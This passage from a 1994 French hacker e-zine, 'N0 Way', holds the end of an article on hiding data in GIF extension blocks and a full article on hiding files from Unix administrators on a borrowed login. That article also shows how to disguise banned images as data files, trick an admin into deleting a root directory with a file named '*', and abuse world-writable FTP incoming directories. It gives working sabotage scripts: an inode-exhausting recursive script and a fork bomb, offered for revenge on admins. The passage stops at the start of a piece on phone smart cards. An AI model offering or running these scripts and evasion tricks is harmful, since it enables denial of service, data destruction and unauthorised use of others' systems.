+===============+
|
||
|
||
+---------------+
|
||
0 | | Block Terminator Byte
|
||
+---------------+
|
||
|
||
i) Extension Introducer - Defines this block as an extension. This
|
||
field contains the fixed value 0x21 ['!' en ASCII].
|
||
|
||
ii) Application Extension Label - Identifies the block as an
|
||
Application Extension. This field contains the fixed value 0xFF.
|
||
|
||
iii) Block Size - Number of bytes in this extension block,
|
||
following the Block Size field, up to but not including the
|
||
beginning of the Application Data. This field contains the fixed
|
||
value 11.
|
||
|
||
iv) Application Identifier - Sequence of eight printable ASCII
|
||
characters used to identify the application owning the Application
|
||
Extension.
|
||
|
||
v) Application Authentication Code - Sequence of three bytes used
|
||
to authenticate the Application Identifier. An Application program
|
||
may use an algorithm to compute a binary code that uniquely
|
||
identifies it as the application owning the Application Extension.
|
||
|
||
|
||
d. Extensions and Scope. This block does not have scope. This block
|
||
cannot be modified by any extension.
|
||
|
||
e. Recommendation. None.
|
||
|
||
Bon, j'espere que tout le monde a compris :-)
|
||
Ce qu'il faut faire devient plus clair:
|
||
Trouvez un endroit ou mettre notre bloc, par exemple la fin du
|
||
fichier ( seek(file, -1, SEEK_END); en C. La fin d'un GIF est
|
||
marqu‚ par un ';' ). Il suffit d'y inserer un '!', le code disant
|
||
que ceci est une Application Extension (0xFF), le numero 11, puis
|
||
votre ID specifique (Sur Compu$serve en forum PICS il y a une liste
|
||
rassemblent tous le Application ID deja utilis‚s, liste ger‚ par
|
||
Larry Wood). Puis vous mettez votre code de 3 bytes, sorte de
|
||
signature pour verifier que ce n'est pas un faux bloc, puis
|
||
finalement vous balancez votre file, sans trop vous soucier de la
|
||
compression (qui selon la doc doit etre RLE), car de toute fa‡on il
|
||
sera decod‚ par un soft maison, et pas par le viewer de GIF.
|
||
Verifiez quand meme qu'aucun byte ne vaut 0, car ce byte marque la
|
||
fin du bloc. Voila, une methode discrete et ais‚. Merci
|
||
Compu$serve.
|
||
|
||
2) Finalement...
|
||
Au fait, j'ai trait‚ certaines methodes, et j'espere que vous
|
||
pensez deja a d'autres (elles sont illimit‚s). Mais, je n'ais pas
|
||
parl‚ de celle mentionn‚ dans l'intro, du Crypted text dans du
|
||
graphic. Ben, heu, a vous de la faire :-) Serieusement j'etudie la
|
||
question, et j'ai vu certains programmes sur BBS qui pretendait
|
||
faire exactement cela. Peut-etre un article ulterieure (enfin,
|
||
j'ai dit peut-etre)...
|
||
|
||
X) Bon, ben la le file est fini. J'espere que vous avez appreci‚,
|
||
car ce fut interessant a ecrire. En cas ou vous auriez deja
|
||
oubli‚, me llamo Arscene, et je prends data/info/mail/insultes/louanges/
|
||
demandes_en_marriage/pots_de_vin/prix_pulitzer/etc en bal Arscene sur
|
||
The 0NE, le RTC EFZ, ou sur A-D. Si besoin, voici ma cl‚:
|
||
|
||
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
||
Version: 2.3a
|
||
|
||
mQCNAi501fkAAAEEAMJm9gMhAGYaOnjYFzTVWxAX17rDX4tUjRG7wD6u5BgyOWFL
|
||
gtyx3p8NQJCtjZOuRGOvSRFdm0l/fYY3qWbaXFOSRAY516ihc0OZurYaTROoIk3u
|
||
/PuCUC9cHJmnFX6LpHj8MUtEpk1A19dM5UYmKQekDcSavCPv/xRorln5z03NAAUR
|
||
tAdBcnNjZW5l
|
||
=IosC
|
||
-----END PGP PUBLIC KEY BLOCK-----
|
||
Contactez moi en BAL avant de m'envoyer quelque chose de
|
||
confidentiel pour verifier que vous avez bien ma VRAIE cl‚.
|
||
---------------------------------------------------------------------
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.7
|
||
|
||
|
||
w____OO____w
|
||
|
||
Playing hide 'n' seek in CyberSpace
|
||
|
||
by ++NeurAlien
|
||
|
||
/\/OO\/\
|
||
|
||
Hey, je recois a l'instant l'article tres kewl d'Arscene et je me dis
|
||
"Helluvabitch... wud B kewl 2 make de zame dingz 4 yunixzz zyztemz !"
|
||
(ce qui veut dire Mr Allg00d :
|
||
"ta mere en Slip bleu devant le Prisu' chausse du 2 !" Ouhahaha )
|
||
|
||
Alors, voila, je vais vous montrer comment jouer au gros chien avec son
|
||
admin de systeme Unix en lui cachant des trucs n'importe ou. Ceci est
|
||
utilisable sans programme sp‚ciaux ni quoi: vous avez juste a connaitre la
|
||
m‚tthode. Et ensuite je vais vous montrer comment vous amuser enormement avec
|
||
les nerfs des admins de serveurs FTP sur le reseau Internet par le biais des
|
||
Incomings directories.
|
||
|
||
Ce N-Phile est dedicace tout specialement … Arscene qui s'applique
|
||
toujours … nous fournir des articles qui relevent le niveau de N0 Way...
|
||
(Ca va plaire, la distribution de NW 3 est assur‚e … grande ‚chelle cette fois
|
||
ci ! :))
|
||
Je tiens a remercier aussi les quelques personnes qui m'ont enseign‚es
|
||
l'art du hacking sous Unix, le Department of Defense aux USA sans lequel je
|
||
n'aurais jamais eu acces a l'Internet (ni vous d'ailleur), les chiens dans la
|
||
rue pour m'avoir souvent permis de me d‚fouler, les "experts en s‚curit‚" pour
|
||
m'avoir souvent fait rire et enfin la brasserie Valstar SA pour m'avoir souvent
|
||
d‚pann‚ ;))
|
||
|
||
Ou est ce que je me planque en local?
|
||
====================================
|
||
Well... Sous Unix c'est pas comme sous DOS, les attributs Caches et
|
||
systemes, hum, yen a pas trop. Par contre unix a un gros avantage:
|
||
il accepte BEAUCOUP BEAUCOUP de caracteres dans ses noms de fichier.
|
||
Par exemple, il accepte les espaces dans ses noms de fichier.
|
||
Ainsi on peut facilement dissimuler cr‚er des fichier qui seront difficilement
|
||
accessibles.
|
||
|
||
On peut cr‚er un fichier "sale admin" par exemple mais bon, ca se remarque !
|
||
Exemple 1:
|
||
======> Script started on Thu Sep 15 02:16:15 1994
|
||
DaubeNet-tmp {101} ls -al
|
||
total 2
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:16 .
|
||
drwx------ 11 fred emprunte 512 Sep 15 02:16 ..
|
||
-rw------- 1 fred emprunte 0 Sep 15 02:16 ex1
|
||
DaubeNet-tmp {102} cat >"sale admin"
|
||
Haha, gros nain, tu sais meme pas effacer un fichier pfff....
|
||
^D
|
||
DaubeNet-tmp {103} exit
|
||
======> Script done on Thu Sep 15 02:17:36 1994
|
||
|
||
Alors la, l'admin quand il se pointe il voie:
|
||
======> Script started on Thu Sep 15 02:19:04 1994
|
||
DaubeNet-tmp {101} ls -al
|
||
total 3
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
|
||
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
||
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
|
||
DaubeNet-tmp {102} exit
|
||
======> Script done on Thu Sep 15 02:19:18 1994
|
||
|
||
Ehehe, voila... Et la l'admin il aura beau tenter:
|
||
======> Script started on Thu Sep 15 02:19:22 1994
|
||
root# ls -al
|
||
total 3
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
|
||
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
||
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
|
||
root# rm sale admin
|
||
rm: sale: No such file or directory.
|
||
rm: admin: No such file or directory.
|
||
root# echo ARghhhhhh
|
||
ARghhhhhh
|
||
root# exit
|
||
======> Script done on Thu Sep 15 02:19:45 1994
|
||
|
||
Bref, pour l'effacer, en fait tout ce qu'il suffit de faire c'est:
|
||
======> Script started on Thu Sep 15 02:20:57 1994
|
||
DaubeNet-tmp {101} ls -al
|
||
total 3
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
|
||
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
||
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
|
||
DaubeNet-tmp {102} rm "sale admin"
|
||
DaubeNet-tmp {103} ls -al
|
||
total 2
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 .
|
||
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
||
DaubeNet-tmp {104} exit
|
||
======> Script done on Thu Sep 15 02:21:11 1994
|
||
|
||
|
||
Ca c'est marrant pour faire un peu chier l'admin mais quand vous voulez
|
||
reellement planquer des trucs, il faut la jouer plus fine. Si par exemple
|
||
root.axs et milnet.dialup sont tres importants pour vous et que vous empruntez
|
||
le login de quelqu'un, vous pouvez les cacher tres simplement.
|
||
Exemple 2:
|
||
|
||
======> Script started on Thu Sep 15 02:25:11 1994
|
||
|
||
DaubeNet-fred {101} ls -al
|
||
total 46
|
||
drwx------ 12 fred emprunte 512 Sep 15 02:24 .
|
||
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
||
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
||
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
||
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
||
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
||
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
||
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
||
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
||
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
||
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
||
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
[voici nos fichiers]
|
||
DaubeNet-fred {102} ll milnet.dialup root.axs
|
||
1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
||
[On cr‚e le directory fantome]
|
||
DaubeNet-fred {103} mkdir ".. "
|
||
[On met nos fichiers dedans]
|
||
DaubeNet-fred {104} mv milnet.dialup root.axs ".. "
|
||
[OOOooOOoOoOps, ca fait drole quand meme deux directory ".." !!!]
|
||
DaubeNet-fred {105} ls -al
|
||
total 44
|
||
drwx------ 13 fred emprunte 512 Sep 15 02:25 .
|
||
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:25 ..
|
||
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
||
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
||
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
||
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
||
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
||
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
||
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
||
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
||
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
DaubeNet-fred {106} cd ".. "
|
||
DaubeNet-fred {107} ls -al
|
||
total 5
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:25 .
|
||
drwx------ 13 fred emprunte 512 Sep 15 02:25 ..
|
||
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
||
DaubeNet-fred {108} cd ..
|
||
DaubeNet-fred {109} mv ".. \milnet.dialup" .
|
||
DaubeNet-fred {110} ls -al
|
||
total 45
|
||
drwx------ 13 fred emprunte 512 Sep 15 02:26 .
|
||
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
||
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
||
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
||
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
||
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
||
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
||
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
||
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
||
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
||
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
DaubeNet-fred {111} mv ".. /milnet.dialup" .
|
||
DaubeNet-fred {112} ls -al
|
||
total 47
|
||
drwx------ 13 fred emprunte 512 Sep 15 02:26 .
|
||
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
||
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
||
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
||
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
||
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
||
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
||
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
||
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
||
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
||
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
||
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
[Alors pour pas faire trop louche, on va creer un directory pour un utilitaire
|
||
bien obscure et qui semble utile … l'admin. Pour le trouver, reflechissez un
|
||
peu et pas la peine de mettre ".Xnewsrc " si votre systeme n'a pas les news ;]
|
||
DaubeNet-fred {113} mkdir ".Xnewsrc "
|
||
DaubeNet-fred {114} mv root.axs milnet.dialup ".Xnewsrc "
|
||
DaubeNet-fred {115} cd ".Xnewsrc "
|
||
DaubeNet-fred {116} ls
|
||
milnet.dialup root.axs
|
||
DaubeNet-fred {117} ll
|
||
total 3
|
||
1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
||
DaubeNet-fred {118} ls -al
|
||
total 5
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:27 .
|
||
drwx------ 14 fred emprunte 512 Sep 15 02:27 ..
|
||
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
||
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
||
DaubeNet-fred {119} cd ..
|
||
DaubeNet-fred {120} ll
|
||
total 43
|
||
1 drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
||
1 -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
||
1 drwx------ 2 fred emprunte 512 Sep 15 02:27 .Xnewsrc
|
||
9 -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
||
1 -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
||
1 drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
||
3 -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
||
1 -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
||
1 -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
||
1 -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
||
8 -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
||
1 -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
||
1 drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
1 drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
1 drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
1 drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
[ c'est discret et ca apparait pas sans l'option "-a" de "ls"]
|
||
DaubeNet-fred {121} ls -l
|
||
total 12
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
DaubeNet-fred {122} rm -fr ".Xnewsrc "
|
||
DaubeNet-fred {123} ls -al
|
||
total 44
|
||
drwx------ 13 fred emprunte 512 Sep 15 02:27 .
|
||
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
||
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
||
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
||
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
||
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
||
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
||
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
||
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
||
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
||
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
||
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
||
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
||
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
||
DaubeNet-fred {124} exit
|
||
|
||
======> Script done on Thu Sep 15 02:28:05 1994
|
||
|
||
Interressant n'est ce pas?
|
||
|
||
Comme ca on peut planquer des trucs sympa meme si il y a un petit "d" au tout
|
||
debut de l'affichage, on peut quand meme les cacher la dedans car en g‚n‚ral
|
||
les admins sont trop flemmards pour aller fouiller la dedans.
|
||
Le nombre d'espace a la fin du fichier peut varier, un seul espace c'est tout
|
||
de suite ce que l'on teste, mais si vous en mettez 42, c'est beaucoup moins
|
||
‚vident.
|
||
|
||
L'int‚ret de cr‚er des fichier commencant par "." est qu'ils ne sont pas list‚s
|
||
… moins qu'on donne l'option "-a" a la commande "ls".
|
||
|
||
Vous pouvez aussi inclure des caracteres de controles dans le nom de vos
|
||
fichier comme ^X ou ^T mais je d‚conseille car ca attire plutot l'attention.
|
||
|
||
Comment je planque mes images?
|
||
=============================
|
||
|
||
Dans certaines ecoles, il y a des rŠgles pas si conne que ca qui
|
||
interdisent les images sur leur r‚seau et donc des moulinettes tournent tous
|
||
les jours pour traquer les .gif, .jpg etc...
|
||
|
||
Pour eviter de vous les faire detruire, vous pouvez les cacher dans des
|
||
fichiers TAR.
|
||
exemple:
|
||
======> Script started on Thu Sep 15 02:49:50 1994
|
||
|
||
DaubeNet-tmp {101} ls -al
|
||
total 778
|
||
drwx------ 2 fred emprunte 512 Sep 15 02:49 .
|
||
drwx------ 13 fred emprunte 512 Sep 15 02:27 ..
|
||
-rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
|
||
-rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
|
||
DaubeNet-tmp {102} tar cvf projet-math.tar hardfuck.gif susan.gif
|
||
hardfuck.gif
|
||
susan.gif
|
||
tar: tar vol 1, 2 files, 0 bytes read, 788480 bytes written.
|
||
DaubeNet-tmp {103} ll
|
||
total 1560
|
||
552 -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
|
||
784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
|
||
224 -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
|
||
DaubeNet-tmp {106} rm hardfuck.gif
|
||
DaubeNet-tmp {107} rm susan.gif
|
||
DaubeNet-tmp {108} ll
|
||
total 784
|
||
784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
|
||
DaubeNet-tmp {109} compress projet-math.tar
|
||
DaubeNet-tmp {110} ll
|
||
total 5
|
||
5 -rw------- 1 fred emprunte 4169 Sep 15 02:50 projet-math.tar.Z
|
||
DaubeNet-tmp {111} exit
|
||
|
||
======> Script done on Thu Sep 15 02:51:17 1994
|
||
|
||
Si le programme de l'admin est assez vicieux pour checker l'interieur des
|
||
fichiers compresses et de le detarer ensuite, vous n'avez qu'a faire cela et
|
||
ensuite UUENCODER votre "projet-math.tar.Z" en un "projet-math.dat" ainsi tout
|
||
le monde (y compris le programme) pensera que c'est un fichier donn‚e.
|
||
|
||
Crypter ses fichiers:
|
||
====================
|
||
Sous unix, il y a un petit utilitaire bien piegeur qui s'appelle crypt.
|
||
Attention, si votre Admin n'est pas trop con, il aura un petit outil appel‚
|
||
gentiment CBW pour Crypt Breaker Workbench qui lui permettra de casser le code
|
||
de crypt. Je vous d‚conseille donc d'utiliser crypt.
|
||
(PS: cbw peut vous ˆtre utile, il est disponible en ftp anonymous un peu
|
||
partout sur l'internet sous le nom: cbw.tar.Z).
|
||
|
||
Par contre, un package genial c'est PGP: un produit qui permet
|
||
d'ampliquer assez simplement le cryptage RSA (ou plutot IDEA) qui semble t'il
|
||
est une combinaison de DES et de RSA.
|
||
|
||
C'est vraiment un outil g‚nial qui vaudrait un article de N0 Way a lui tout
|
||
seul.
|
||
|
||
Faire criser son admin:
|
||
======================
|
||
Vous savez certainnement que sous Unix, certains caracteres sont
|
||
interpret‚s par le Shell avant d'executer la commande dans laquelle ‚tait le
|
||
fameux caractere.
|
||
Ce caractere c'est par exemple "*" qui va ˆtre remplac‚ par les noms de tous
|
||
les fichiers du directory en question.
|
||
Amusez vous a cr‚er dans un directory hyper important de votre admin un fichier
|
||
nomm‚ "*".
|
||
|
||
Exemple:
|
||
|
||
======> Script started on Thu Sep 15 03:11:09 1994
|
||
|
||
DaubeNet-/home/root {101} ls -al
|
||
total 778
|
||
drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
|
||
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
|
||
-rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
|
||
-rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
|
||
DaubeNet-/home/root {102} cat >\*
|
||
^D
|
||
DaubeNet-/home/root {103} ll
|
||
total 776
|
||
0 -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
|
||
552 -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
|
||
224 -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
|
||
DaubeNet-/home/root {104} exit
|
||
|
||
======> Script done on Thu Sep 15 03:11:40 1994
|
||
|
||
L'admin (assez con pour laisser son directory en lecture / ecriture) a une
|
||
jolie bombe a retardement qu'il va s'empresser d'allumer des qu'il se loggera.
|
||
|
||
======> Script started on Thu Sep 15 03:18:54 1994
|
||
|
||
DaubeNet-/home/root {101} ls -al
|
||
total 778
|
||
-rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
|
||
drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
|
||
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
|
||
-rw------- 1 root wheel 557056 Sep 15 02:49 important.txt
|
||
-rw------- 1 root wheel 221184 Sep 15 02:48 whole-sources.c
|
||
DaubeNet-/home/root {102} rm *
|
||
DaubeNet-/home/root {103} ll
|
||
DaubeNet-/home/root {104} ls -al
|
||
total 2
|
||
drwxrwxrwx 2 root wheel 512 Sep 15 03:19 .
|
||
drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
|
||
DaubeNet-/home/root {105} echo Arghhhhh
|
||
Arghhhhh
|
||
DaubeNet-/home/root {106} exit
|
||
|
||
======> Script done on Thu Sep 15 03:19:21 1994
|
||
|
||
VOila, c'est fini pour la partie locale...
|
||
Maintenant, je vais vous expliquer comment vous servir des r‚pertoires
|
||
incomings et autres pour vous transferer des fichier.
|
||
|
||
Le FTP anonyme:
|
||
==============
|
||
Sur FTP Anonyme, vous avez souvent un directory "/incoming" qui vous permet de
|
||
d‚poser des fichiers pour l'admin.
|
||
Un site bien configur‚ aura mis comme mode pour ce dir: rwxrwxr-t qui veut
|
||
dire: rwx : lecture/ecriture/traversee possible pour l'owner
|
||
rwx : meme chose pour le groupe
|
||
-wt : acces en ecriture avec travers‚e du directory possible mais sans
|
||
possibilit‚ d'effacer le fichier d'un autre.
|
||
|
||
Un site mal configur‚ aura pour mode: rwxrwxrwx qui veut dire:
|
||
lecture, ecriture et travers‚e pour tout le monde.
|
||
Donc vous pourrez vous cr‚er par un
|
||
ftp> mkdir ".. "
|
||
un fichier secret et ensuite d‚poser les dernieres versions d'Excel ou le
|
||
dernier N0 Way pour vos amis qui viendront les recuperer plus tard et les
|
||
effacer!
|
||
|
||
Interressant n'est ce pas? Ainsi, hop, vous pouvez faire transiter anonymement
|
||
des trucs sur Internet.
|
||
|
||
I-node muncher:
|
||
==============
|
||
Un admin vous a vraiment fait une crasse? Vous ˆtes vert et vous
|
||
voulez un peu le faire chier...
|
||
un "rm -fr /" ? C'est vraiment con car ca peut causer de sales problŠmes … des
|
||
personnes qui n'ont rien fait.
|
||
Ce qui est mieux c'est de faire un peu chier l'admin en lui bouffant tous ses
|
||
Inodes. Un inode c'est le num‚ro qui d‚signe un fichier dans le filesystem
|
||
unix donc si vous les prenez tous, personne ne pourra plus creer de fichier
|
||
mˆme si il reste plein de place sur le disque.
|
||
Alors voila le shell script nw.sh:
|
||
$ cat >nw.sh <<EOF
|
||
#!/bin/csh
|
||
umask 000
|
||
mkdir N0way
|
||
cp nw.sh N0way
|
||
cd N0way
|
||
chmod +x nw.sh
|
||
./nw.sh &
|
||
EOF
|
||
$
|
||
|
||
Executez ce fichier et *kaboummm* le systŠme va commencer … s‚rieusement merder
|
||
hehehehehe...
|
||
Vous pouvez mˆme en lancer plusieurs.
|
||
|
||
Task muncher:
|
||
============
|
||
Vous pouvez faire la mˆme chose avec les processus si les quotas ne
|
||
tournent pas. En faisant tourner un seul process qui a chaque fois forke 5
|
||
fois et vous verrez que plus la machine va vite, plus votre programme investira
|
||
rapidement l'ordinateur en question.
|
||
$ cat >dontkill.sh <<EOF
|
||
#!/bin/csh
|
||
./dontkill.sh &
|
||
./dontkill.sh &
|
||
./dontkill.sh &
|
||
./dontkill.sh &
|
||
./dontkill.sh &
|
||
EOF
|
||
$
|
||
|
||
Voila, c'est le fion. Euh... la fin.
|
||
J'espere que ce ++N-Phile vous aura ‚t‚ bien utile et occupera longtemps votre
|
||
admin. N'oubliez pas une chose,
|
||
IL EXISTE QUAND MEME DES ADMINS COOLS ALORS, laissez ceux la tranquile. :))
|
||
|
||
The End.
|
||
|
||
|
||
|
||
|
||
|
||
C'est fini.... y a rien en dessous...
|
||
|
||
|
||
|
||
|
||
STOP !!!! YA PLUS RIEN.
|
||
<EOF>
|
||
|
||
|
||
Non mais c'est dingue, Vous etes sourd ou quoi, je vous repete que c'est FINI!
|
||
:)
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.8
|
||
|
||
|
||
Voila, Neuralien m'a presse pour ‚crire ce petit texte veuillez ne pas tenir
|
||
compte des fotes d'orthographes et autre stupidit‚es du meme genre.
|
||
[Bahh... fo tout le temps presser tout le monde. On me le fait bien hehe:
|
||
"NeurAlien, depeche toi, c'est quand qu'il sort N0 Way 4?
|
||
- Euh... bin attend mon pote, on a pas encore sorti le 3!!! :)" ++N]
|
||
|
||
|
||
CARTES TELEPHONIQUES
|
||
1/2
|
||
Pour NOWAY
|
||
PAR D. O'CONNELL
|
||
|
||
Depuis "l'invention" par le fumeux Roland Moreno en 1975 de la carte … puce
|
||
les applications se sont multipli‚es. La plus connue ‚tant celle des
|
||
t‚l‚phones … cartes, on va donc ‚tudier le mode de fonctionnement de ces
|
||
cartes dans le but ‚vident d'en ameliorer le fonctionnement..
|
||
|
||
La realisation technique de la carte tient plus du bricolo que de l'invention
|
||
g‚niale, le seul (et grand) m‚rite de Moreno a ‚t‚ d'ˆtre un visionaire
|
||
g‚nial.
|
||
On peut r‚sumer le fonctionnement de la carte … une eprom … acces serie donc …
|
||
priori rien de bien compliqu‚, nost‚l‚cartes francaises comportent une simple
|
||
m‚moire de 256 bits, oui vous avez bien lu 32 octets!
|
||
|
